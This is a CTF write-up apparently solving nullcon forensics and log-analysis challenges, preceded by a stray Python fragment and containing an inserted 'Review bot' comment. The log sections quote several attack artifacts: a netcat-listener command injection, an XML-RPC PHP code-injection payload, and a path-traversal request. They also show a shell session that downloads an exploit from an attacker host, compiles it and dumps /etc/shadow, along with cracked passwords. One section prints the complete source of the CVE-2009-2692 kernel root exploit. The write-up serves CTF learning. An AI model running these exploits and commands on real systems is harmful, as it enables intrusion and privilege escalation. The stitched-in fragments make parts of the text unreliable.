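PARTS = [(2048, 411647, "boot"), (415744, 999966, "data")]
TOTAL = 1_000_000


def demo():
    entries = build_entries(PARTS)
    header = build_header(entries, TOTAL)
    ok, problems, f = parse_header(header)
    gaps = unallocated_ranges(parse_entries(entries, f[11]), f[7], f[8])
    bad_ok, bad_problems, _ = parse_header(damage_like_page(header))
    return ok, gaps, bad_ok, bad_problems


if __name__ == "__main__":
    print(demo())
```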
Fix the header magic value (EFI PART) and the number of partitions using vi in binary mode (:%!xxd) and run mmls again. (See references)
[nullc0n]$ mmls -t gpt ./image3.dd
Invalid sector address (gpt_load_table: Starting sector too large for image)
Download Sleuthkit and comment out the section where mmls is throwing the error and exiting. Compile and run.
Patch:
[nullc0n]$ diff -pu sleuthkit-3.2.3/tsk3/vs/gpt.c*
--- sleuthkit-3.2.3/tsk3/vs/gpt.c 2012-01-15 18:32:13.302732773 +0530+++ sleuthkit-3.2.3/tsk3/vs/gpt.c.orig 2012-01-20 16:43:37.251203455 +0530@@ -212,7 +212,7 @@ gpt_load_table(TSK_VS_INFO * vs) } // make sure the first couple are in the image bounds- /*if ((i < 2)+ if ((i < 2) && (tsk_getu64(vs->endian, ent->start_lba) > max_addr)) { tsk_error_reset(); tsk_errno = TSK_ERR_VS_BLK_NUM;@@ -221,7 +221,7 @@ gpt_load_table(TSK_VS_INFO * vs) free(sect_buf); free(ent_buf); return 1;- }*/+ } if ((name = tsk_malloc(256)) == NULL) {
[nullc0n]$ ./sleuthkit-3.2.3/tools/vstools/mmls -t gpt ./image3.dd
GUID Partition Table (EFI)
Offset Sector: 0
Units are in 512-byte sectors
     Slot    Start        End          Length       Description
00:  Meta    0000000000   0000000000   0000000001   Safety Table
01:  -----   0000000000   0000002047   0000002048   Unallocated
02:  Meta    0000000001   0000000001   0000000001   GPT Header
03:  Meta    0000000002   0000000004   0000000003   Partition Table
04:  00      0000002048   0098566144   0098564097
05:  08      0098566145   0098568191   0000002047
06:  01      0098568192   0182454271   0083886080
07:  02      0182454272   0203425791   0020971520
08:  03      0203425792   0253757439   0050331648
09:  04      0253757440   0310380543   0056623104
10:  05      0310380544   0352323583   0041943040
11:  06      0352323584   0406849535   0054525952
12:  07      0406849536   0488397134   0081547599
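Review bot: the diff is the wrong way round: the `---` side is the edited gpt.c and the `+++` side is gpt.c.orig, so both hunks read as restoring the bounds check rather than removing it, and anyone reproducing this with `patch` on a fresh sleuthkit-3.2.3 tree needs `-R` (or the two arguments to `diff -pu` swapped). Separately, wrapping `if ((i < 2) && (tsk_getu64(vs->endian, ent->start_lba) > max_addr))` in `/* ... */` deletes the only guard in gpt_load_table against a partition entry whose start_lba lies past the image; for a damaged image the lighter change is to keep the check and replace `return 1;` with a warning that skips that entry, so the `tsk_malloc(256)` name handling that follows only runs for entries inside the image bounds.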
Referred to the Wikipedia article on the GUID Partition Table for the UUIDs of the file system types. Mapping done manually.
References:
http://en.wikipedia.org/wiki/Master_boot_record
http://en.wikipedia.org/wiki/GUID_Partition_Table
http://www.aqfire.com/boot/
http://www.digitalforensics.ch/nikkel09.pdf

Forensics Level 5: Universal Swindlers Bayonet
Anusandhaanic Daakus Ltd. is a company whose strength lies in the research it conducts. Very often the employees leaving the organisation manage to carry the research data along with them. This time the company decided to go for an investigation and called upon a forensic investigator. This investigator captured the memory dump and shut the system down. On resuming the system he finds that the drive has been encrypted and is left with only the memory dump.
You as an investigator are required to find out the following information from the dump:
1) Serial No. of the external drive
2) Date and time (IST) when the drive was first connected
3) Date and time (IST) when the drive was last connected
4) Launching which other executable (not nullcon.exe) resulted in the launching of nullcon.exe
Tools Used: strings, grep, volatility framework
Steps:
[flevel5]$ python ./volatility/trunk/vol.py hivelist -f ./null.img
Volatile Systems Volatility Framework 2.1_alpha
Virtual    Physical   Name
0x8067b184 0x0067b184 [no name]
0xe19fb380 0x0a1ec380 \Device\HarddiskVolume1\Documents and Settings\user\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1a448d0 0x0a5038d0 \Device\HarddiskVolume1\Documents and Settings\user\NTUSER.DAT
0xe17599f8 0x089629f8 \Device\HarddiskVolume1\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1754008 0x0895b008 \Device\HarddiskVolume1\Documents and Settings\LocalService\NTUSER.DAT
0xe172b430 0x08508430 \Device\HarddiskVolume1\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1726698 0x083fd698 \Device\HarddiskVolume1\Documents and Settings\NetworkService\NTUSER.DAT
0xe1447008 0x06c9d008 \Device\HarddiskVolume1\WINDOWS\system32\config\software
0xe1447b60 0x06c9db60 \Device\HarddiskVolume1\WINDOWS\system32\config\default
0xe14476b8 0x06c9d6b8 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM
0xe1430330 0x06c90330 \Device\HarddiskVolume1\WINDOWS\system32\config\SECURITY
0xe1331b60 0x02c6eb60 [no name]
0xe101bad8 0x02994ad8 \Device\HarddiskVolume1\WINDOWS\system32\config\system
0xe1008b60 0x029cdb60 [no name]
We find that SYSTEM is located at offset 0xe101bad8. We use this to print specific registry keys.
[flevel5]$ python ./volatility/trunk/vol.py printkey -o 0xe101bad8 -K "CurrentControlSet" -f null.img
Volatile Systems Volatility Framework 2.1_alpha
Legend: (S) = Stable   (V) = Volatile
----------------------------
Registry: User Specified
Key name: CurrentControlSet (V)
Last updated: 2012-01-06 12:39:30
Subkeys:
Values:
REG_LINK      SymbolicLinkValue : (V) \Registry\Machine\System\ControlSet001
[flevel5]$ python ./volatility/trunk/vol.py printkey -o 0xe101bad8 -K "ControlSet001\Control\DeviceClasses" -f null.img
Volatile Systems Volatility Framework 2.1_alpha
Legend: (S) = Stable   (V) = Volatile
----------------------------
Registry: User Specified
Key name: DeviceClasses (S)
Last updated: 2012-01-05 13:24:36
Subkeys:
  (S) {378de44c-56ef-11d1-bc8c-00a0c91405dd}
  (S) {3abf6f2d-71c4-462a-8a92-1e6861e6af27}
  (S) {a5dcbf10-6530-11d2-901f-00c04fb951ed}
  (S) {f18a0e88-c30c-11d0-8815-00a0c906bed8}
[flevel5]$ python ./volatility/trunk/vol.py printkey -o 0xe101bad8 -K "ControlSet001\Control\DeviceClasses\{a5dcbf10-6530-11d2-901f-00c04fb951ed}" -f null.img
Volatile Systems Volatility Framework 2.1_alpha
Legend: (S) = Stable   (V) = Volatile
----------------------------
Registry: User Specified
Key name: {a5dcbf10-6530-11d2-901f-00c04fb951ed} (S)
Last updated: 2012-01-05 13:24:36
Subkeys:
  (S) ##?#USB#Vid_0bc2&Pid_2101#2GEL32TN#{a5dcbf10-6530-11d2-901f-00c04fb951ed}
Values:
[flevel5]$ python ./volatility/trunk/vol.py printkey -o 0xe101bad8 -K "ControlSet001\Control\DeviceClasses\{a5dcbf10-6530-11d2-901f-00c04fb951ed}\##?#USB#Vid_0bc2&Pid_2101#2GEL32TN#{a5dcbf10-6530-11d2-901f-00c04fb951ed}" -f null.img
Volatile Systems Volatility Framework 2.1_alpha
Legend: (S) = Stable   (V) = Volatile
----------------------------
Registry: User Specified
Key name: ##?#USB#Vid_0bc2&Pid_2101#2GEL32TN#{a5dcbf10-6530-11d2-901f-00c04fb951ed} (S)
Last updated: 2012-01-06 12:22:13
Subkeys:
  (S) #
Values:
REG_SZ        DeviceInstance : (S) USB\Vid_0bc2&Pid_2101\2GEL32TN
From the above, we find that the serial number of the removable disk is 2GEL32TN.
When it was first connected, the registry entry SYSTEM\ControlSet001\Control\DeviceClasses\{a5dcbf10-6530-11d2-901f-00c04fb951ed} was created. Therefore its last update time, 2012-01-05 13:24:36 UTC, is our flag 2 after converting to IST.
Its subkey ##?#USB#Vid_0bc2&Pid_2101#2GEL32TN#{a5dcbf10-6530-11d2-901f-00c04fb951ed} is updated every time the device is connected. Therefore its last update time is our flag 3.
Used pslist in volatility to list the processes:
Offset(V)  Name                 PID    PPID   Thds   Hnds   Time
---------- -------------------- ------ ------ ------ ------ -------------------
0x821c6a00 System               4      0      59     240    1970-01-01 00:00:00
0x81f5fb10 smss.exe             580    4      3      21     2012-01-06 12:39:37
0x81ff92a0 csrss.exe            644    580    11     349    2012-01-06 12:39:38
0x81ff8da0 winlogon.exe         668    580    20     503    2012-01-06 12:39:38
0x81fe35d0 services.exe         712    668    15     258    2012-01-06 12:39:38
0x81feebb8 lsass.exe            724    668    26     343    2012-01-06 12:39:38
0x81fa8ac0 svchost.exe          900    712    20     201    2012-01-06 12:39:38
0x82018438 svchost.exe          968    712    10     227    2012-01-06 12:39:39
0x81f84210 svchost.exe          1056   712    72     1193   2012-01-06 12:39:39
0x82002530 svchost.exe          1176   712    5      58     2012-01-06 12:39:39
0x81fe8620 svchost.exe          1212   712    14     204    2012-01-06 12:39:39
0x81f586f0 spoolsv.exe          1336   712    13     122    2012-01-06 12:39:39
0x81f7a428 explorer.exe         1584   1568   13     374    2012-01-06 12:39:40
0x81b73020 alg.exe              516    712    7      103    2012-01-06 12:39:49
0x81b941e0 nullcon.exe          484    1584   1      22     2012-01-06 12:40:07
0x81b403a8 cmd.exe              1048   1584   1      31     2012-01-06 12:40:13
0x81ba3020 cmd.exe              320    484    1      28     2012-01-06 12:40:20
0x81b7b020 win32dd.exe          856    1048   1      21     2012-01-06 12:40:30
Initially thought Flag 4 would be explorer.exe, which is the parent process of nullcon.exe. However, it was not correct.
Used strings and grep to search for nullcon.exe:
[flevel5]$ strings null.img |grep -i nullcon.exe
nullcon.exe
C:\WINDOWS\system32\Nullcon.exe
C:\WINDOWS\system32\Nullcon.exe
nullcon.exe
NULLCON.EXE
C:\WINDOWS\system32\Nullcon.exe
C:\WINDOWS\system32\Nullcon.exe
Nullcon.exe
C:\WINDOWS\system32\Nullcon.exe
Nullcon.exe "C:\WINDOWS\system32\mshearts.exe"
Nullcon.exe
This gives us Flag 4 as mshearts.exe
References:
1. https://blogs.sans.org/computer-forensics/files/2009/08/usb_device_forensics_xp_guide.pdf
2. http://cse.spsu.edu/raustin2/coursefiles/forensics/How_to_use_Volatility_v2.pdf

Log Analysis Level 1: Basic
Log URL: http://www.nullcon.net/challenge/data/report
Found an interesting line in the log:
+ OSVDB-3268: GET /challenge/logically_insane/ : Directory indexing is enabled: /challenge/logically_insane/
Found askmelater.asp in /challenge/logically_insane
Clue: Ask the proper question to get the proper answer
<!-- askmelater.asp?question=? -->
Question: How to find the flag?
http://www.nullcon.net/challenge/logically_insane/askmelater.asp?question=how%20to%20find%20the%20flag?
Flag: 6bb61e3b7bce0931da574d19d1d82c88

Log Analysis Level 2: Mystery Password
Find the password for the user suppadmin
Log URL: http://www.nullcon.net/challenge/data/log3.pcap
Tools Used: Wireshark
Steps: Open the file in Wireshark.
Flag: ..Supp@..adm1n   # Flag includes the dots

Log Analysis Level 3: Clever Intruder
Log URL: http://www.nullcon.net/challenge/data/access.rar
Only 3 IPs were found in the log. Started with 192.168.0.107
[nullc0n]$ cat access.log |grep 192.168.0.107
192.168.0.107 - - [06/Jan/2012:00:56:04 +0530] "GET /index.php HTTP/1.1" 200 1364 "http://192.168.0.106/index.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
192.168.0.107 - - [06/Jan/2012:00:56:04 +0530] "GET /javascript/jquery.js HTTP/1.1" 404 511 "http://192.168.0.106/index.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
192.168.0.107 - - [06/Jan/2012:00:56:04 +0530] "GET /javascript/common.js HTTP/1.1" 404 511 "http://192.168.0.106/index.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
192.168.0.107 - - [06/Jan/2012:00:56:05 +0530] "GET /Contacts.php HTTP/1.1" 500 274 "http://192.168.0.106/index.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
192.168.0.107 - - [06/Jan/2012:00:56:12 +0530] "GET /add-contact.php HTTP/1.1" 500 274 "http://192.168.0.106/index.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
192.168.0.107 - - [06/Jan/2012:00:56:16 +0530] "GET /search.php HTTP/1.1" 500 274 "http://192.168.0.106/index.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
192.168.0.107 - - [06/Jan/2012:00:57:51 +0530] "GET /search.php HTTP/1.1" 500 274 "http://192.168.0.106/index.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
192.168.0.107 - - [06/Jan/2012:00:58:00 +0530] "GET /contact.php?c=bmMgLWwgLXAgNjY2Ng== HTTP/1.1" 500 274 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
Base64decode("bmMgLWwgLXAgNjY2Ng==") = "nc -l -p 6666"
Flags:
Vulnerable Page: contact.php
Port Opened: 6666
Intruder IP: 192.168.0.107

Log Analysis Level 4: Exploited!!!
The CVE of the exploit is the flag.
Log URL:
http://www.nullcon.net/challenge/data/burp.rar
Approach: Searched for successful requests, i.e. HTTP response code 200 (<status>200</status>). Found 27 such request/response pairs.
Among them, the following looks interesting:
<item>
  <time>Thu Jan 12 02:29:39 EST 2012</time>
  <url><![CDATA[http://192.168.221.154/tikiwiki/scripts/server.php]]></url>
  <host ip="192.168.221.154">192.168.221.154</host>
  <port>80</port>
  <protocol>http</protocol>
  <method>POST</method>
  <path><![CDATA[/tikiwiki/scripts/server.php]]></path>
  <extension>php</extension>
  <request><![CDATA[POST /tikiwiki/scripts/server.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 192.168.221.154
User-Agent: Internet Explorer 6.0
Content-Length: 360

<?xml version="1.0"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>,)); system(id); die; /*</name></value></param></params></methodCall>]]></request>
  <status>200</status>
  <responselength>283</responselength>
  <mimetype>text</mimetype>
  <response><![CDATA[HTTP/1.1 200 OK
Date: Thu, 12 Jan 2012 07:24:16 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Connection: close
Content-Type: text/html
Content-Length: 54

uid=33(www-data) gid=33(www-data) groups=33(www-data)
]]></response>
  <comment></comment>
</item>
From the above it looks like a code execution bug in the XML-RPC library used by TikiWiki. A Google search yielded CVE-2005-1921.
Flag: CVE-2005-1921

Log Analysis Level 5: Waat Laga Server
Log URL: http://www.nullcon.net/challenge/data/dump.rar
Flag-I: Vulnerable Parameter in 1st Attack
Flag-II: Vulnerable Parameter in 2nd Attack
Flag-III: Names of the people who discovered the Local Privilege Escalation Exploit used
Flag-IV: root Password
Tools Used: Wireshark, john
Loaded the file in Wireshark. Sorted the packets by packet size and used Follow TCP Stream to analyse the sessions, starting with the largest ones. Found the following in one such TCP stream:
  38. 38. sh: no job control in this shellsh-3.1$ iduid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_sys_script_tsh-3.1$ uname -aLinux ctf4.sas.upenn.edu 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386GNU/Linuxsh-3.1$ cd /tmp/sh-3.1$ ls -latotal 904drwxrwxrwt 15 root root 4096 Jan 11 10:07 .drwxr-xr-x 23 root root 4096 Jan 11 09:38 ..drwxrwxrwt 2 root root 4096 Jan 11 07:15 .ICE-unix-r--r--r-- 1 root root 11 Jan 11 07:07 .X0-lockdrwxrwxrwt 2 root root 4096 Jan 11 07:07 .X11-unixdrwxrwxrwt 2 root root 4096 Jan 11 07:06 .font-unixsrw-rw-rw- 1 root root 0 Jan 11 07:07 .gdm_socketdrwx------ 2 root root 4096 Mar 6 2009 .mozilla-rw-rw-rw- 1 mysql mysql 13 Jan 11 09:57 1.txt-rw-rw-rw- 1 mysql mysql 36 Jan 11 09:58 2.txtdrwx------ 2 achen achen 4096 Mar 10 2009 gconfd-achendrwx------ 2 dstevens dstevens 4096 Mar 11 2009 gconfd-dstevensdrwx------ 2 ghighland ghighland 4096 Mar 10 2009 gconfd-ghighlanddrwx------ 2 root root 4096 Mar 18 2009 gconfd-rootdrwx------ 3 sorzek sorzek 4096 Jan 11 07:15 gconfd-sorzekdrwx------ 2 sorzek sorzek 4096 Jan 11 07:15 keyring-FiP3XIsrwxrwxr-x 1 achen achen 0 Mar 10 2009 mapping-achensrwxrwxr-x 1 dstevens dstevens 0 Mar 11 2009 mapping-dstevenssrwxrwxr-x 1 ghighland ghighland 0 Mar 10 2009 mapping-ghighlandsrwxr-xr-x 1 root root 0 Mar 18 2009 mapping-rootsrwxrwxr-x 1 sorzek sorzek 0 Jan 11 07:15 mapping-sorzekdrwx------ 2 sorzek sorzek 4096 Jan 11 07:16 orbit-sorzek-rwsr-xr-x 1 root root 720888 Jan 11 10:09 shdrwx------ 2 sorzek sorzek 4096 Jan 11 07:15 ssh-yXwuKb2964-rw-rw-rw- 1 mysql mysql 13 Jan 11 10:07 test1.txt-rw-rw-rw- 1 mysql mysql 36 Jan 11 10:07 test2.txtdrwx------ 2 sorzek sorzek 4096 Jan 11 07:15 virtual-sorzek.7IeXOH-rw------- 1 sorzek sorzek 1062 Jan 11 08:15 xses-sorzek.HeSMY4sh-3.1$ wget http://192.168.221.130/exploit/9479.c--10:09:30-- http://192.168.221.130/exploit/9479.c => `9479.cConnecting to 192.168.221.130:80... connected.HTTP request sent, awaiting response... 
200 OKLength: 3,379 (3.3K) [text/x-csrc] 0K ... 100% 61.97 MB/s10:09:30 (61.97 MB/s) - `9479.c saved [3379/3379]sh-3.1$ gcc 9479.c -o rootsh-3.1$ ./rootsh: no job control in this shell
sh-3.1# id
uid=0(root) gid=0(root) groups=48(apache) context=system_u:system_r:httpd_sys_script_t
sh-3.1# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dstevens:x:500:506:Don Stevens:/home/dstevens:/bin/bash
achen:x:501:501:Andrew Chen:/home/achen:/bin/bash
pmoore:x:502:502:Phillip Moore:/home/pmoore:/bin/bash
jdurbin:x:503:503:James Durbin:/home/jdurbin:/bin/bash
sorzek:x:504:504:Sally Orzek:/home/sorzek:/bin/bash
ghighland:x:505:505:Greg Highland:/home/ghighland:/bin/bash
ossec:x:506:508::/var/ossec:/sbin/nologin
ossecm:x:507:508::/var/ossec:/sbin/nologin
ossecr:x:508:508::/var/ossec:/sbin/nologin
sh-3.1# cat /etc/issue
Fedora Core release 5 (Bordeaux)
Kernel \r on an \m

sh-3.1# cat /etc/shadow
root:$1$IW2CPQzs$ba/aJ9zePc/r9tF2R6KAJ0:15350:0:99999:7:::
bin:*:14309:0:99999:7:::
daemon:*:14309:0:99999:7:::
adm:*:14309:0:99999:7:::
lp:*:14309:0:99999:7:::
sync:*:14309:0:99999:7:::
shutdown:*:14309:0:99999:7:::
halt:*:14309:0:99999:7:::
mail:*:14309:0:99999:7:::
news:*:14309:0:99999:7:::
uucp:*:14309:0:99999:7:::
operator:*:14309:0:99999:7:::
games:*:14309:0:99999:7:::
gopher:*:14309:0:99999:7:::
ftp:*:14309:0:99999:7:::
nobody:*:14309:0:99999:7:::
dbus:!!:14309:0:99999:7:::
rpm:!!:14309:0:99999:7:::
apache:!!:14309:0:99999:7:::
distcache:!!:14309:0:99999:7:::
ntp:!!:14309:0:99999:7:::
nscd:!!:14309:0:99999:7:::
vcsa:!!:14309:0:99999:7:::
webalizer:!!:14309:0:99999:7:::
dovecot:!!:14309:0:99999:7:::
mysql:!!:14309:0:99999:7:::
netdump:!!:14309:0:99999:7:::
pcap:!!:14309:0:99999:7:::
avahi:!!:14309:0:99999:7:::
named:!!:14309:0:99999:7:::
mailnull:!!:14309:0:99999:7:::
smmsp:!!:14309:0:99999:7:::
haldaemon:!!:14309:0:99999:7:::
rpc:!!:14309:0:99999:7:::
xfs:!!:14309:0:99999:7:::
gdm:!!:14309:0:99999:7:::
rpcuser:!!:14309:0:99999:7:::
nfsnobody:!!:14309:0:99999:7:::
sshd:!!:14309:0:99999:7:::
dstevens:$1$fU8HOHqa$N542xtl0ft8NmsYkv5NFo/:14309:0:99999:7:::
achen:$1$kxyn25Oz$w.MMADGQYIq4F52hi9DUQ.:14309:0:99999:7:::
pmoore:$1$p0RXlomV$m03UsjoTZ08qG8gbWHgST0:14309:0:99999:7:::
jdurbin:$1$CYmEyuc.$FXAeZHkhywwENbqE8h0O.0:14309:0:99999:7:::
sorzek:$1$cWeWNRdU$VTtlKsoRBmhMghnkSwqCQ.:14312:0:99999:7:::
ghighland:$1$ooKvtZEY$N2RpSaIylgFlHnBkbwUGz0:14309:0:99999:7:::
ossec:!!:14312:0:99999:7:::
ossecm:!!:14312:0:99999:7:::
ossecr:!!:14312:0:99999:7:::
sh-3.1# exit
exit
sh-3.1$ exit
exit

Copied /etc/shadow to pass.txt and ran john (http://www.openwall.com/john/) against it with the downloaded wordlist (http://download.openwall.net/pub/wordlists/all.gz) to crack the password file.

[nullc0n]$ john -show pass.txt
root:zuzana:15350:0:99999:7:::
sorzek:pacman:14312:0:99999:7:::
2 password hashes cracked, 5 left

This gives us Flag IV: zuzana

In another TCP session we got:

HTTP/1.1 200 OK
Date: Thu, 12 Jan 2012 06:18:26 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 11 Jan 2012 12:36:23 GMT
ETag: "41d4c-d33-4b63fe12b3b1c"
Accept-Ranges: bytes
Content-Length: 3379
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/x-csrc

/*
**
** 0x82-CVE-2009-2692
** Linux kernel 2.4/2.6 (32bit) sock_sendpage() local ring0 root exploit (simple ver)
** Tested RedHat Linux 9.0, Fedora core 4~11, Whitebox 4, CentOS 4.x.
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** spender and venglins code is very excellent.
** Thankful to them.
**
** Greets: Brad Spengler <spender(at)grsecurity(dot)net>,
** Przemyslaw Frasunek <venglin(at)czuby(dot)pl>.
** --
** exploit by <p0c73n1(at)gmail(dot)com>.
**
** "Slow and dirty exploit for this one"
**
*/

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>

unsigned int uid, gid;

void kernel_code()
{
    unsigned long where=0;
    unsigned long *pcb_task_struct;

    where=(unsigned long )&where;
    where&=~8191;
    pcb_task_struct=(unsigned long *)where;

    while(pcb_task_struct){
        if(pcb_task_struct[0]==uid&&pcb_task_struct[1]==uid&&
            pcb_task_struct[2]==uid&&pcb_task_struct[3]==uid&&
            pcb_task_struct[4]==gid&&pcb_task_struct[5]==gid&&
            pcb_task_struct[6]==gid&&pcb_task_struct[7]==gid){
            pcb_task_struct[0]=pcb_task_struct[1]=pcb_task_struct[2]=pcb_task_struct[3]=0;
            pcb_task_struct[4]=pcb_task_struct[5]=pcb_task_struct[6]=pcb_task_struct[7]=0;
            break;
        }
        pcb_task_struct++;
    }
    return;
    /*
    ** By calling iret after pushing a register into kernel stack,
    ** We dont have to go back to ring3(user mode) privilege level. dont worry. :-}
    **
    ** kernel_code() function will return to its previous status which means before sendfile() systemcall,
    ** after operating upon a ring0(kernel mode) privilege level.
    ** This will enhance the viablity of the attack code even though each kernel can have different CS and DS address.
    */
}

void *kernel=kernel_code;

int main(int argc,char *argv[])
{
    int fd_in=0,fd_out=0,offset=1;
    void *zero_page;

    uid=getuid();
    gid=getgid();

    if(uid==0){
        fprintf(stderr,"[-] check ur uid\n");
        return -1;
    }

    /*
    ** There are some cases that we need mprotect due to the dependency matter with SVR4.
    ** (however, I did not confirm it yet)
    */
    if(personality(0xffffffff)==PER_SVR4){
        if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
            perror("[-] mprotect()");
            return -1;
        }
    }
    else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
        perror("[-] mmap()");
        return -1;
    }

    *(char *)0x00000000=0xff;
    *(char *)0x00000001=0x25;
    *(unsigned long *)0x00000002=(unsigned long)&kernel;
    *(char *)0x00000006=0xc3;

    if((fd_in=open(argv[0],O_RDONLY))==-1){
        perror("[-] open()");
        return -1;
    }
    if((fd_out=socket(PF_APPLETALK,SOCK_DGRAM,0))==-1){
        if((fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0))==-1){
            perror("[-] socket()");
            return -1;
        }
    }

gogossing:
    /*
    ** Sometimes, the attacks can fail. To enlarge the possiblilty of attack,
    ** an attacker can make all the processes runing under current user uid 0.
    */
    if(sendfile(fd_out,fd_in,&offset,2)==-1){
        if(offset==0){
            perror("[-] sendfile()");
            return -1;
        }
        close(fd_out);
        fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0);
    }
    if(getuid()==uid){
        if(offset){
            offset=0;
        }
        goto gogossing; /* all process */
    }

    close(fd_in);
    close(fd_out);
    execl("/bin/sh","sh","-i",NULL);

    return 0;
}
/* eoc */

// milw0rm.com [2009-08-24]

This gives us Flag III as Tavis Ormandy and Julien Tinnes.

Another TCP session gave the following:

GET /index.html?page=../../../../../../../../../tmp/test2.txt%00&c=ls HTTP/1.1
Host: 192.168.221.143
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive

HTTP/1.1 200 OK
Date: Wed, 11 Jan 2012 15:08:00 GMT
Server: Apache/2.2.0 (Fedora)
X-Powered-By: PHP/5.1.2
Content-Length: 1373
Connection: close
Content-Type: text/html; charset=UTF-8

<html><head><title> Prof. Ehks</title><style type="text/css">
BODY {
    font-family: helvetica, arial;
    padding: 0px;
    margin: 0px;
}
TABLE.nav {
    background-color: #336699;
}
TABLE.nav a {
    color: white;
    text-decoration: none;
}
H1.title {
    width: 100%;
    background-color: #6699cc;
    padding: 5px;
    margin: 0px;
    border-bottom: 3px solid #113366;
}
DIV#main {
    margin: 5px;
}
</style></head>
<body>
<table width="100%" class="nav"><tr>
    <td><a href="index.html?title=Home Page">Home</a></td>
    <td><a href="index.html?page=blog&title=Blog">Blog</a></td>
    <td><a href="index.html?page=research&title=Research">Research</a></td>
    <td><a href="index.html?page=contact&title=Contact">Contact</a></td>
    <form method="post" action="index.html?page=search&title=Search Results">
    <td><input type="text" value="search" name="searchterm"/><input type="submit" value="Go"/></td>
    </form>
    <!--<td><a href="/usage">Stats</a></td>-->
</tr>
</table>
<h1 class="title">Professor Ehks Center for Data Studies</h1>
<div id="main">
